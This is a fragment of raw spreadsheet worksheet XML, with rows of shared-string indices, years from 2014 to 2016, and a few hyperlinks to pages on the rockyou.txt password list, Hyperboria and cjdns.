      </c>
      <c r="I334" s="33" t="str">
        <f>HYPERLINK("https://wiki.skullsecurity.org/Passwords","rockyou.txt")</f>
        <v>rockyou.txt</v>
      </c>
      <c r="J334" s="30" t="s">
        <v>4216</v>
      </c>
    </row>
    <row r="335">
      <c r="A335" s="30" t="s">
        <v>1815</v>
      </c>
      <c r="B335" s="31">
        <v>2015.0</v>
      </c>
      <c r="C335" s="30" t="s">
        <v>4219</v>
      </c>
      <c r="D335" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E335" s="35" t="s">
        <v>51</v>
      </c>
      <c r="F335" s="35" t="s">
        <v>4221</v>
      </c>
      <c r="G335" s="30" t="s">
        <v>4222</v>
      </c>
      <c r="H335" s="30" t="s">
        <v>1139</v>
      </c>
      <c r="I335" s="30"/>
      <c r="J335" s="30"/>
    </row>
    <row r="336">
      <c r="A336" s="30" t="s">
        <v>2131</v>
      </c>
      <c r="B336" s="31">
        <v>2015.0</v>
      </c>
      <c r="C336" s="30" t="s">
        <v>4225</v>
      </c>
      <c r="D336" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E336" s="30" t="s">
        <v>1222</v>
      </c>
      <c r="F336" s="35" t="s">
        <v>4196</v>
      </c>
      <c r="G336" s="30" t="s">
        <v>4229</v>
      </c>
      <c r="H336" s="30" t="s">
        <v>4230</v>
      </c>
      <c r="I336" s="30"/>
    </row>
    <row r="337">
      <c r="A337" s="30" t="s">
        <v>2131</v>
      </c>
      <c r="B337" s="31">
        <v>2015.0</v>
      </c>
      <c r="C337" s="30" t="s">
        <v>4231</v>
      </c>
      <c r="D337" s="30" t="s">
        <v>1474</v>
      </c>
      <c r="E337" s="30" t="s">
        <v>1222</v>
      </c>
      <c r="F337" s="35" t="s">
        <v>4232</v>
      </c>
      <c r="G337" s="30" t="s">
        <v>4233</v>
      </c>
      <c r="H337" s="30" t="s">
        <v>4234</v>
      </c>
      <c r="I337" s="30"/>
    </row>
    <row r="338">
      <c r="A338" s="34" t="s">
        <v>2131</v>
      </c>
      <c r="B338" s="134">
        <v>2015.0</v>
      </c>
      <c r="C338" s="34" t="s">
        <v>4235</v>
      </c>
      <c r="D338" s="34" t="s">
        <v>48</v>
      </c>
      <c r="E338" s="34" t="s">
        <v>4236</v>
      </c>
      <c r="F338" s="32" t="s">
        <v>4237</v>
      </c>
      <c r="G338" s="34" t="s">
        <v>4238</v>
      </c>
      <c r="H338" s="135" t="str">
        <f>HYPERLINK("http://hyperboria.net/","What is Hyperboria")</f>
        <v>What is Hyperboria</v>
      </c>
      <c r="I338" s="200" t="str">
        <f>HYPERLINK("https://github.com/cjdelisle/cjdns","What is cjdns")</f>
        <v>What is cjdns</v>
      </c>
      <c r="J338" s="105"/>
      <c r="K338" s="105"/>
      <c r="L338" s="105"/>
      <c r="M338" s="105"/>
      <c r="N338" s="105"/>
      <c r="O338" s="105"/>
      <c r="P338" s="105"/>
      <c r="Q338" s="105"/>
      <c r="R338" s="105"/>
      <c r="S338" s="105"/>
      <c r="T338" s="105"/>
      <c r="U338" s="105"/>
      <c r="V338" s="105"/>
      <c r="W338" s="105"/>
      <c r="X338" s="105"/>
      <c r="Y338" s="105"/>
      <c r="Z338" s="105"/>
    </row>
    <row r="339">
      <c r="A339" s="30" t="s">
        <v>4059</v>
      </c>
      <c r="B339" s="31">
        <v>2015.0</v>
      </c>
      <c r="C339" s="30" t="s">
        <v>4246</v>
      </c>
      <c r="D339" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E339" s="30" t="s">
        <v>2693</v>
      </c>
      <c r="F339" s="35" t="s">
        <v>4247</v>
      </c>
      <c r="G339" s="30" t="s">
        <v>4248</v>
      </c>
      <c r="H339" s="30" t="s">
        <v>4249</v>
      </c>
      <c r="I339" s="30"/>
    </row>
    <row r="340">
      <c r="A340" s="30" t="s">
        <v>4059</v>
      </c>
      <c r="B340" s="31">
        <v>2015.0</v>
      </c>
      <c r="C340" s="30" t="s">
        <v>4251</v>
      </c>
      <c r="D340" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E340" s="30" t="s">
        <v>1222</v>
      </c>
      <c r="F340" s="35" t="s">
        <v>4254</v>
      </c>
      <c r="G340" s="30" t="s">
        <v>4257</v>
      </c>
      <c r="H340" s="30" t="s">
        <v>4258</v>
      </c>
      <c r="I340" s="30"/>
    </row>
    <row r="341">
      <c r="A341" s="5" t="s">
        <v>1303</v>
      </c>
      <c r="B341" s="43">
        <v>2015.0</v>
      </c>
      <c r="C341" s="5" t="s">
        <v>4259</v>
      </c>
      <c r="D341" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E341" s="5" t="s">
        <v>1222</v>
      </c>
      <c r="F341" s="5" t="s">
        <v>4260</v>
      </c>
      <c r="G341" s="5" t="s">
        <v>4261</v>
      </c>
      <c r="H341" s="3"/>
    </row>
    <row r="342">
      <c r="A342" s="5" t="s">
        <v>1303</v>
      </c>
      <c r="B342" s="43">
        <v>2015.0</v>
      </c>
      <c r="C342" s="5" t="s">
        <v>4262</v>
      </c>
      <c r="D342" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E342" s="5" t="s">
        <v>2724</v>
      </c>
      <c r="F342" s="5" t="s">
        <v>4264</v>
      </c>
      <c r="G342" s="5" t="s">
        <v>4265</v>
      </c>
      <c r="H342" s="3"/>
    </row>
    <row r="343">
      <c r="A343" s="30" t="s">
        <v>1159</v>
      </c>
      <c r="B343" s="31">
        <v>2015.0</v>
      </c>
      <c r="C343" s="30" t="s">
        <v>4267</v>
      </c>
      <c r="D343" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E343" s="30" t="s">
        <v>797</v>
      </c>
      <c r="F343" s="35" t="s">
        <v>4268</v>
      </c>
      <c r="G343" s="30" t="s">
        <v>4269</v>
      </c>
      <c r="H343" s="30" t="s">
        <v>1139</v>
      </c>
      <c r="I343" s="30"/>
    </row>
  </sheetData>
  <mergeCells count="6">
    <mergeCell ref="G31:H31"/>
    <mergeCell ref="G32:H32"/>
    <mergeCell ref="G35:H35"/>
    <mergeCell ref="G207:I207"/>
    <mergeCell ref="G208:I208"/>
    <mergeCell ref="G209:I209"/>
  </mergeCells>
  <hyperlinks>
    <hyperlink r:id="rId1" ref="H13"/>
    <hyperlink r:id="rId2" ref="H17"/>
    <hyperlink r:id="rId3" ref="I19"/>
    <hyperlink r:id="rId4" ref="H102"/>
    <hyperlink r:id="rId5" ref="H104"/>
    <hyperlink r:id="rId6" ref="H107"/>
    <hyperlink r:id="rId7" ref="G114"/>
    <hyperlink r:id="rId8" ref="I135"/>
    <hyperlink r:id="rId9" ref="J135"/>
    <hyperlink r:id="rId10" ref="H136"/>
    <hyperlink r:id="rId11" ref="H144"/>
    <hyperlink r:id="rId12" ref="H176"/>
    <hyperlink r:id="rId13" ref="H189"/>
    <hyperlink r:id="rId14" location="forensic-magnifier" ref="H198"/>
    <hyperlink r:id="rId15" ref="G199"/>
    <hyperlink r:id="rId16" ref="H217"/>
    <hyperlink r:id="rId17" ref="I217"/>
    <hyperlink r:id="rId18" ref="J217"/>
    <hyperlink r:id="rId19" ref="K217"/>
    <hyperlink r:id="rId20" ref="H218"/>
    <hyperlink r:id="rId21" ref="I218"/>
    <hyperlink r:id="rId22" ref="H221"/>
    <hyperlink r:id="rId23" ref="H228"/>
    <hyperlink r:id="rId24" ref="I228"/>
    <hyperlink r:id="rId25" ref="J228"/>
    <hyperlink r:id="rId26" ref="H229"/>
    <hyperlink r:id="rId27" ref="H231"/>
    <hyperlink r:id="rId28" ref="H232"/>
    <hyperlink r:id="rId29" ref="I232"/>
    <hyperlink r:id="rId30" ref="G234"/>
    <hyperlink r:id="rId31" ref="H234"/>
    <hyperlink r:id="rId32" ref="G235"/>
    <hyperlink r:id="rId33" ref="H237"/>
    <hyperlink r:id="rId34" ref="H238"/>
    <hyperlink r:id="rId35" ref="I238"/>
    <hyperlink r:id="rId36" ref="H245"/>
    <hyperlink r:id="rId37" ref="H249"/>
    <hyperlink r:id="rId38" ref="H250"/>
    <hyperlink r:id="rId39" ref="I250"/>
    <hyperlink r:id="rId40" ref="H253"/>
    <hyperlink r:id="rId41" ref="H254"/>
    <hyperlink r:id="rId42" ref="H255"/>
    <hyperlink r:id="rId43" ref="J255"/>
    <hyperlink r:id="rId44" ref="K255"/>
    <hyperlink r:id="rId45" ref="G256"/>
    <hyperlink r:id="rId46" ref="G259"/>
    <hyperlink r:id="rId47" location="Simple_File_Transfer_Protocol" ref="G261"/>
    <hyperlink r:id="rId48" ref="H261"/>
    <hyperlink r:id="rId49" ref="H262"/>
    <hyperlink r:id="rId50" ref="H263"/>
    <hyperlink r:id="rId51" ref="H266"/>
    <hyperlink r:id="rId52" ref="H267"/>
    <hyperlink r:id="rId53" ref="H268"/>
    <hyperlink r:id="rId54" ref="H272"/>
    <hyperlink r:id="rId55" ref="G300"/>
    <hyperlink r:id="rId56" ref="H301"/>
    <hyperlink r:id="rId57" ref="H323"/>
    <hyperlink r:id="rId58" ref="I323"/>
    <hyperlink r:id="rId59" ref="H324"/>
    <hyperlink r:id="rId60" ref="I324"/>
    <hyperlink r:id="rId61" ref="J324"/>
    <hyperlink r:id="rId62" ref="K324"/>
    <hyperlink r:id="rId63" ref="H327"/>
    <hyperlink r:id="rId64" ref="H329"/>
    <hyperlink r:id="rId65" ref="I329"/>
    <hyperlink r:id="rId66" ref="H330"/>
    <hyperlink r:id="rId67" ref="H333"/>
    <hyperlink r:id="rId68" ref="I333"/>
    <hyperlink r:id="rId69" ref="J333"/>
    <hyperlink r:id="rId70" ref="I334"/>
    <hyperlink r:id="rId71" ref="H338"/>
    <hyperlink r:id="rId72" ref="I338"/>
  </hyperlinks>
  <drawing r:id="rId7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9.14"/>
    <col customWidth="1" min="5" max="5" width="38.86"/>
    <col customWidth="1" min="6" max="6" width="37.43"/>
    <col customWidth="1" min="7" max="7" width="26.14"/>
    <col customWidth="1" min="8" max="8" width="35.86"/>
  </cols>
  <sheetData>
    <row r="1">
      <c r="A1" s="2" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="2" t="s">
        <v>1</v>
      </c>
      <c r="C1" s="2" t="s">
        <v>2</v>
      </c>
      <c r="D1" s="2" t="s">
        <v>3</v>
      </c>
      <c r="E1" s="2" t="s">
        <v>5</v>
      </c>
      <c r="F1" s="2" t="s">
        <v>6</v>
      </c>
      <c r="G1" s="2" t="s">
        <v>7</v>
      </c>
      <c r="H1" s="2" t="s">
        <v>3574</v>
      </c>
    </row>
    <row r="2">
      <c r="A2" s="6" t="s">
        <v>9</v>
      </c>
      <c r="B2" s="7"/>
      <c r="C2" s="6"/>
      <c r="D2" s="6"/>
      <c r="E2" s="6"/>
      <c r="F2" s="6"/>
      <c r="G2" s="6"/>
      <c r="H2" s="6"/>
      <c r="I2" s="8"/>
      <c r="J2" s="8"/>
      <c r="K2" s="9"/>
      <c r="L2" s="9"/>
      <c r="M2" s="9"/>
      <c r="N2" s="9"/>
      <c r="O2" s="9"/>
      <c r="P2" s="9"/>
      <c r="Q2" s="9"/>
      <c r="R2" s="9"/>
      <c r="S2" s="9"/>
      <c r="T2" s="9"/>
      <c r="U2" s="9"/>
      <c r="V2" s="9"/>
      <c r="W2" s="9"/>
      <c r="X2" s="9"/>
      <c r="Y2" s="9"/>
      <c r="Z2" s="9"/>
      <c r="AA2" s="9"/>
      <c r="AB2" s="9"/>
    </row>
    <row r="3">
      <c r="A3" s="2" t="s">
        <v>16</v>
      </c>
      <c r="B3" s="11">
        <v>2016.0</v>
      </c>
      <c r="C3" s="2" t="s">
        <v>3575</v>
      </c>
      <c r="D3" s="2" t="s">
        <v>23</v>
      </c>
      <c r="E3" s="2" t="s">
        <v>3576</v>
      </c>
      <c r="F3" s="2" t="s">
        <v>806</v>
      </c>
      <c r="G3" s="14" t="s">
        <v>3577</v>
      </c>
      <c r="H3" s="3"/>
    </row>
    <row r="4">
      <c r="A4" s="2" t="s">
        <v>16</v>
      </c>
      <c r="B4" s="11">
        <v>2016.0</v>
      </c>
      <c r="C4" s="2" t="s">
        <v>3578</v>
      </c>
      <c r="D4" s="2" t="s">
        <v>23</v>
      </c>
      <c r="E4" s="2" t="s">
        <v>3579</v>
      </c>
      <c r="F4" s="2" t="s">
        <v>3580</v>
      </c>
      <c r="G4" s="3"/>
      <c r="H4" s="3"/>
    </row>
    <row r="5">
      <c r="A5" s="2" t="s">
        <v>16</v>
      </c>
      <c r="B5" s="11">
        <v>2016.0</v>
      </c>
      <c r="C5" s="2" t="s">
        <v>3581</v>
      </c>
      <c r="D5" s="2" t="s">
        <v>48</v>
      </c>
      <c r="E5" s="2" t="s">
        <v>3582</v>
      </c>
      <c r="F5" s="2" t="s">
        <v>806</v>
      </c>
      <c r="G5" s="3"/>
      <c r="H5" s="3"/>
    </row>
    <row r="6">
      <c r="A6" s="2" t="s">
        <v>16</v>
      </c>
      <c r="B6" s="11">
        <v>2016.0</v>
      </c>
      <c r="C6" s="2" t="s">
        <v>3583</v>
      </c>
      <c r="D6" s="2" t="s">
        <v>128</v>
      </c>
      <c r="E6" s="2" t="s">
        <v>3584</v>
      </c>
      <c r="F6" s="13" t="s">
        <v>3585</v>
      </c>
      <c r="G6" s="3"/>
      <c r="H6" s="3"/>
    </row>
    <row r="7">
      <c r="A7" s="2" t="s">
        <v>16</v>
      </c>
      <c r="B7" s="11">
        <v>2016.0</v>
      </c>
      <c r="C7" s="2" t="s">
        <v>3586</v>
      </c>
      <c r="D7" s="2" t="s">
        <v>23</v>
      </c>
      <c r="E7" s="2" t="s">
        <v>3587</v>
      </c>
      <c r="F7" s="2" t="s">
        <v>3588</v>
      </c>
      <c r="G7" s="3"/>
      <c r="H7" s="3"/>
    </row>
    <row r="8">
      <c r="A8" s="2" t="s">
        <v>16</v>
      </c>
      <c r="B8" s="11">
        <v>2016.0</v>
      </c>
      <c r="C8" s="2" t="s">
        <v>3589</v>
      </c>
      <c r="D8" s="2" t="s">
        <v>23</v>
      </c>
      <c r="E8" s="2" t="s">
        <v>3587</v>
      </c>
      <c r="F8" s="2" t="s">
        <v>3590</v>
      </c>
      <c r="G8" s="3"/>
      <c r="H8" s="3"/>
    </row>
    <row r="9">
      <c r="A9" s="2" t="s">
        <v>16</v>
      </c>
      <c r="B9" s="11">
        <v>2016.0</v>
      </c>
      <c r="C9" s="2" t="s">
        <v>3591</v>
      </c>
      <c r="D9" s="2" t="s">
        <v>128</v>
      </c>
      <c r="E9" s="2" t="s">
        <v>3592</v>
      </c>
      <c r="F9" s="2" t="s">
        <v>3593</v>
      </c>
      <c r="G9" s="15" t="s">
        <v>3594</v>
      </c>
      <c r="H9" s="3"/>
    </row>
    <row r="10">
      <c r="A10" s="2" t="s">
        <v>61</v>
      </c>
      <c r="B10" s="11">
        <v>2014.0</v>
      </c>
      <c r="C10" s="2" t="s">
        <v>3595</v>
      </c>
      <c r="D10" s="2" t="s">
        <v>23</v>
      </c>
      <c r="E10" s="2" t="s">
        <v>3596</v>
      </c>
      <c r="F10" s="2" t="s">
        <v>3597</v>
      </c>
      <c r="G10" s="3"/>
      <c r="H10" s="3"/>
    </row>
    <row r="11">
      <c r="A11" s="2" t="s">
        <v>167</v>
      </c>
      <c r="B11" s="11">
        <v>2016.0</v>
      </c>
      <c r="C11" s="2" t="s">
        <v>3598</v>
      </c>
      <c r="D11" s="2" t="s">
        <v>3599</v>
      </c>
      <c r="E11" s="2" t="s">
        <v>3600</v>
      </c>
      <c r="F11" s="2" t="s">
        <v>300</v>
      </c>
      <c r="G11" s="3"/>
      <c r="H11" s="3"/>
    </row>
    <row r="12">
      <c r="A12" s="2" t="s">
        <v>167</v>
      </c>
      <c r="B12" s="11">
        <v>2016.0</v>
      </c>
      <c r="C12" s="2" t="s">
        <v>3601</v>
      </c>
      <c r="D12" s="2" t="s">
        <v>3599</v>
      </c>
      <c r="E12" s="3"/>
      <c r="F12" s="2" t="s">
        <v>300</v>
      </c>
      <c r="G12" s="14" t="s">
        <v>3602</v>
      </c>
      <c r="H12" s="3"/>
    </row>
    <row r="13">
      <c r="A13" s="2" t="s">
        <v>167</v>
      </c>
      <c r="B13" s="11">
        <v>2016.0</v>
      </c>
      <c r="C13" s="2" t="s">
        <v>3603</v>
      </c>
      <c r="D13" s="2" t="s">
        <v>128</v>
      </c>
      <c r="E13" s="3"/>
      <c r="F13" s="2" t="s">
        <v>300</v>
      </c>
      <c r="G13" s="14" t="s">
        <v>3604</v>
      </c>
      <c r="H13" s="3"/>
    </row>
    <row r="14">
      <c r="A14" s="17">
        <v>42503.0</v>
      </c>
      <c r="B14" s="7"/>
      <c r="C14" s="6"/>
      <c r="D14" s="6"/>
      <c r="E14" s="6"/>
      <c r="F14" s="6"/>
      <c r="G14" s="6"/>
      <c r="H14" s="6"/>
      <c r="I14" s="8"/>
      <c r="J14" s="8"/>
      <c r="K14" s="9"/>
      <c r="L14" s="9"/>
      <c r="M14" s="9"/>
      <c r="N14" s="9"/>
      <c r="O14" s="9"/>
      <c r="P14" s="9"/>
      <c r="Q14" s="9"/>
      <c r="R14" s="9"/>
      <c r="S14" s="9"/>
      <c r="T14" s="9"/>
      <c r="U14" s="9"/>
      <c r="V14" s="9"/>
      <c r="W14" s="9"/>
      <c r="X14" s="9"/>
      <c r="Y14" s="9"/>
      <c r="Z14" s="9"/>
      <c r="AA14" s="9"/>
      <c r="AB14" s="9"/>
    </row>
    <row r="15">
      <c r="A15" s="2" t="s">
        <v>239</v>
      </c>
      <c r="B15" s="11">
        <v>2014.0</v>
      </c>
      <c r="C15" s="2" t="s">
        <v>3605</v>
      </c>
      <c r="D15" s="2" t="s">
        <v>23</v>
      </c>
      <c r="E15" s="2" t="s">
        <v>3606</v>
      </c>
      <c r="F15" s="2" t="s">
        <v>3607</v>
      </c>
      <c r="G15" s="2" t="s">
        <v>3608</v>
      </c>
      <c r="H15" s="2" t="s">
        <v>91</v>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="2" t="s">
        <v>239</v>
      </c>
      <c r="B16" s="11">
        <v>2014.0</v>
      </c>
      <c r="C16" s="2" t="s">
        <v>3609</v>
      </c>
      <c r="D16" s="2" t="s">
        <v>48</v>
      </c>
      <c r="E16" s="2" t="s">
        <v>3606</v>
      </c>
      <c r="F16" s="2" t="s">
        <v>3610</v>
      </c>
      <c r="G16" s="3"/>
      <c r="H16" s="2" t="s">
        <v>300</v>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="2" t="s">
        <v>239</v>
      </c>
      <c r="B17" s="11">
        <v>2014.0</v>
      </c>
      <c r="C17" s="2" t="s">
        <v>3611</v>
      </c>
      <c r="D17" s="2" t="s">
        <v>48</v>
      </c>
      <c r="E17" s="2" t="s">
        <v>3612</v>
      </c>
      <c r="F17" s="2" t="s">
        <v>3613</v>
      </c>
      <c r="G17" s="2" t="s">
        <v>3614</v>
      </c>
      <c r="H17" s="63" t="s">
        <v>3615</v>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="2" t="s">
        <v>239</v>
      </c>
      <c r="B18" s="11">
        <v>2014.0</v>
      </c>
      <c r="C18" s="2" t="s">
        <v>3616</v>
      </c>
      <c r="D18" s="2" t="s">
        <v>3617</v>
      </c>
      <c r="E18" s="2" t="s">
        <v>3618</v>
      </c>
      <c r="F18" s="2" t="s">
        <v>3619</v>
      </c>
      <c r="G18" s="3"/>
      <c r="H18" s="2" t="s">
        <v>3621</v>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="2" t="s">
        <v>239</v>
      </c>
      <c r="B19" s="11">
        <v>2014.0</v>
      </c>
      <c r="C19" s="2" t="s">
        <v>3622</v>
      </c>
      <c r="D19" s="2" t="s">
        <v>3617</v>
      </c>
      <c r="E19" s="2" t="s">
        <v>3623</v>
      </c>
      <c r="F19" s="2" t="s">
        <v>3624</v>
      </c>
      <c r="G19" s="3"/>
      <c r="H19" s="2" t="s">
        <v>3625</v>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="19" t="s">
        <v>38</v>
      </c>
      <c r="B20" s="20">
        <v>2014.0</v>
      </c>
      <c r="C20" s="19" t="s">
        <v>3627</v>
      </c>
      <c r="D20" s="19" t="s">
        <v>23</v>
      </c>
      <c r="E20" s="19" t="s">
        <v>3628</v>
      </c>
      <c r="F20" s="19" t="s">
        <v>3629</v>
      </c>
      <c r="G20" s="3"/>
      <c r="H20" s="170" t="s">
        <v>3631</v>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="19" t="s">
        <v>38</v>
      </c>
      <c r="B21" s="20">
        <v>2014.0</v>
      </c>
      <c r="C21" s="19" t="s">
        <v>3636</v>
      </c>
      <c r="D21" s="19" t="s">
        <v>48</v>
      </c>
      <c r="E21" s="19" t="s">
        <v>3637</v>
      </c>
      <c r="F21" s="19" t="s">
        <v>3638</v>
      </c>
      <c r="G21" s="14" t="s">
        <v>3639</v>
      </c>
      <c r="H21" s="171" t="s">
        <v>3631</v>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="17">
        <v>42507.0</v>
      </c>
      <c r="B22" s="7"/>
      <c r="C22" s="6"/>
      <c r="D22" s="6"/>
      <c r="E22" s="6"/>
      <c r="F22" s="6"/>
      <c r="G22" s="6"/>
      <c r="H22" s="6"/>
      <c r="I22" s="8"/>
      <c r="J22" s="8"/>
      <c r="K22" s="9"/>
      <c r="L22" s="9"/>
      <c r="M22" s="9"/>
      <c r="N22" s="9"/>
      <c r="O22" s="9"/>
      <c r="P22" s="9"/>
      <c r="Q22" s="9"/>
      <c r="R22" s="9"/>
      <c r="S22" s="9"/>
      <c r="T22" s="9"/>
      <c r="U22" s="9"/>
      <c r="V22" s="9"/>
      <c r="W22" s="9"/>
      <c r="X22" s="9"/>
      <c r="Y22" s="9"/>
      <c r="Z22" s="9"/>
      <c r="AA22" s="9"/>
      <c r="AB22" s="9"/>
    </row>
    <row r="23">
      <c r="A23" s="146" t="s">
        <v>236</v>
      </c>
      <c r="B23" s="147">
        <v>2014.0</v>
      </c>
      <c r="C23" s="146" t="s">
        <v>3647</v>
      </c>
      <c r="D23" s="146" t="s">
        <v>128</v>
      </c>
      <c r="E23" s="146" t="s">
        <v>1993</v>
      </c>
      <c r="F23" s="146" t="s">
        <v>3649</v>
      </c>
      <c r="G23" s="146" t="s">
        <v>3651</v>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="146" t="s">
        <v>236</v>
      </c>
      <c r="B24" s="147">
        <v>2014.0</v>
      </c>
      <c r="C24" s="146" t="s">
        <v>3653</v>
      </c>
      <c r="D24" s="146" t="s">
        <v>128</v>
      </c>
      <c r="E24" s="146" t="s">
        <v>116</v>
      </c>
      <c r="F24" s="146" t="s">
        <v>3654</v>
      </c>
      <c r="G24" s="146" t="s">
        <v>3655</v>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="2" t="s">
        <v>230</v>
      </c>
      <c r="B25" s="11">
        <v>2014.0</v>
      </c>
      <c r="C25" s="2" t="s">
        <v>3656</v>
      </c>
      <c r="D25" s="2" t="s">
        <v>23</v>
      </c>
      <c r="E25" s="61" t="s">
        <v>3657</v>
      </c>
      <c r="F25" s="2" t="s">
        <v>300</v>
      </c>
      <c r="G25" s="2"/>
      <c r="H25" s="3"/>
    </row>
    <row r="26">
      <c r="A26" s="36" t="s">
        <v>230</v>
      </c>
      <c r="B26" s="31">
        <v>2014.0</v>
      </c>
      <c r="C26" s="36" t="s">
        <v>3659</v>
      </c>
      <c r="D26" s="36" t="s">
        <v>128</v>
      </c>
      <c r="E26" s="144" t="s">
        <v>3660</v>
      </c>
      <c r="F26" s="144" t="s">
        <v>3661</v>
      </c>
      <c r="G26" s="36"/>
      <c r="H26" s="30"/>
    </row>
    <row r="27">
      <c r="A27" s="36" t="s">
        <v>230</v>
      </c>
      <c r="B27" s="31">
        <v>2014.0</v>
      </c>
      <c r="C27" s="36" t="s">
        <v>3662</v>
      </c>
      <c r="D27" s="36" t="s">
        <v>48</v>
      </c>
      <c r="E27" s="36" t="s">
        <v>3663</v>
      </c>
      <c r="F27" s="36" t="s">
        <v>186</v>
      </c>
      <c r="G27" s="36" t="s">
        <v>186</v>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="17">
        <v>42517.0</v>
      </c>
      <c r="B28" s="7"/>
      <c r="C28" s="6"/>
      <c r="D28" s="6"/>
      <c r="E28" s="6"/>
      <c r="F28" s="6"/>
      <c r="G28" s="6"/>
      <c r="H28" s="6"/>
      <c r="I28" s="8"/>
      <c r="J28" s="8"/>
      <c r="K28" s="9"/>
      <c r="L28" s="9"/>
      <c r="M28" s="9"/>
      <c r="N28" s="9"/>
      <c r="O28" s="9"/>
      <c r="P28" s="9"/>
      <c r="Q28" s="9"/>
      <c r="R28" s="9"/>
      <c r="S28" s="9"/>
      <c r="T28" s="9"/>
      <c r="U28" s="9"/>
      <c r="V28" s="9"/>
      <c r="W28" s="9"/>
      <c r="X28" s="9"/>
      <c r="Y28" s="9"/>
      <c r="Z28" s="9"/>
      <c r="AA28" s="9"/>
      <c r="AB28" s="9"/>
    </row>
    <row r="29">
      <c r="A29" s="5" t="s">
        <v>502</v>
      </c>
      <c r="B29" s="43">
        <v>2014.0</v>
      </c>
      <c r="C29" s="5" t="s">
        <v>482</v>
      </c>
      <c r="D29" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E29" s="5" t="s">
        <v>71</v>
      </c>
      <c r="F29" s="5" t="s">
        <v>3667</v>
      </c>
      <c r="G29" s="5" t="s">
        <v>3668</v>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="37" t="s">
        <v>348</v>
      </c>
      <c r="B30" s="39">
        <v>2014.0</v>
      </c>
      <c r="C30" s="37" t="s">
        <v>3669</v>
      </c>
      <c r="D30" s="37" t="s">
        <v>23</v>
      </c>
      <c r="E30" s="61" t="s">
        <v>3670</v>
      </c>
      <c r="F30" s="61" t="s">
        <v>3671</v>
      </c>
      <c r="G30" s="172" t="s">
        <v>3672</v>
      </c>
      <c r="H30" s="156"/>
    </row>
    <row r="31">
      <c r="A31" s="5" t="s">
        <v>424</v>
      </c>
      <c r="B31" s="43">
        <v>2014.0</v>
      </c>
      <c r="C31" s="5" t="s">
        <v>3679</v>
      </c>
      <c r="D31" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E31" s="5" t="s">
        <v>3680</v>
      </c>
      <c r="F31" s="5" t="s">
        <v>3682</v>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="5" t="s">
        <v>434</v>
      </c>
      <c r="B32" s="43">
        <v>2014.0</v>
      </c>
      <c r="C32" s="5" t="s">
        <v>3684</v>
      </c>
      <c r="D32" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E32" s="5" t="s">
        <v>3685</v>
      </c>
      <c r="F32" s="5" t="s">
        <v>3686</v>
      </c>
      <c r="G32" s="3"/>
    </row>
    <row r="33">
      <c r="A33" s="30" t="s">
        <v>464</v>
      </c>
      <c r="B33" s="31">
        <v>2014.0</v>
      </c>
      <c r="C33" s="31">
        <v>2048.0</v>
      </c>
      <c r="D33" s="35" t="s">
        <v>48</v>
      </c>
      <c r="E33" s="35" t="s">
        <v>3688</v>
      </c>
      <c r="F33" s="30" t="s">
        <v>3690</v>
      </c>
      <c r="H33" s="30" t="s">
        <v>3691</v>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="30" t="s">
        <v>472</v>
      </c>
      <c r="B34" s="31">
        <v>2014.0</v>
      </c>
      <c r="C34" s="30" t="s">
        <v>3693</v>
      </c>
      <c r="D34" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E34" s="35" t="s">
        <v>3695</v>
      </c>
      <c r="F34" s="35" t="s">
        <v>3697</v>
      </c>
      <c r="H34" s="30" t="s">
        <v>71</v>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="23" t="s">
        <v>481</v>
      </c>
      <c r="B35" s="24">
        <v>2014.0</v>
      </c>
      <c r="C35" s="23" t="s">
        <v>3700</v>
      </c>
      <c r="D35" s="23" t="s">
        <v>48</v>
      </c>
      <c r="E35" s="23" t="s">
        <v>300</v>
      </c>
      <c r="F35" s="23" t="s">
        <v>4</v>
      </c>
      <c r="G35" s="23" t="s">
        <v>3702</v>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="174" t="s">
        <v>481</v>
      </c>
      <c r="B36" s="175">
        <v>2014.0</v>
      </c>
      <c r="C36" s="174" t="s">
        <v>3713</v>
      </c>
      <c r="D36" s="174" t="s">
        <v>128</v>
      </c>
      <c r="E36" s="174" t="s">
        <v>116</v>
      </c>
      <c r="F36" s="174" t="s">
        <v>3715</v>
      </c>
      <c r="K36" s="30"/>
      <c r="L36" s="30"/>
      <c r="M36" s="30"/>
      <c r="N36" s="30"/>
      <c r="O36" s="30"/>
      <c r="P36" s="30"/>
      <c r="Q36" s="30"/>
      <c r="R36" s="30"/>
      <c r="S36" s="30"/>
      <c r="T36" s="30"/>
      <c r="U36" s="30"/>
      <c r="V36" s="30"/>
      <c r="W36" s="30"/>
      <c r="X36" s="30"/>
      <c r="Y36" s="30"/>
      <c r="Z36" s="30"/>
      <c r="AA36" s="30"/>
      <c r="AB36" s="30"/>
    </row>
    <row r="37">
      <c r="A37" s="86" t="s">
        <v>1125</v>
      </c>
      <c r="B37" s="87">
        <v>2014.0</v>
      </c>
      <c r="C37" s="86" t="s">
        <v>3718</v>
      </c>
      <c r="D37" s="86" t="s">
        <v>23</v>
      </c>
      <c r="E37" s="86" t="s">
        <v>716</v>
      </c>
      <c r="F37" s="86" t="s">
        <v>682</v>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="17">
        <v>42521.0</v>
      </c>
      <c r="B38" s="7"/>
      <c r="C38" s="6"/>
      <c r="D38" s="6"/>
      <c r="E38" s="6"/>
      <c r="F38" s="6"/>
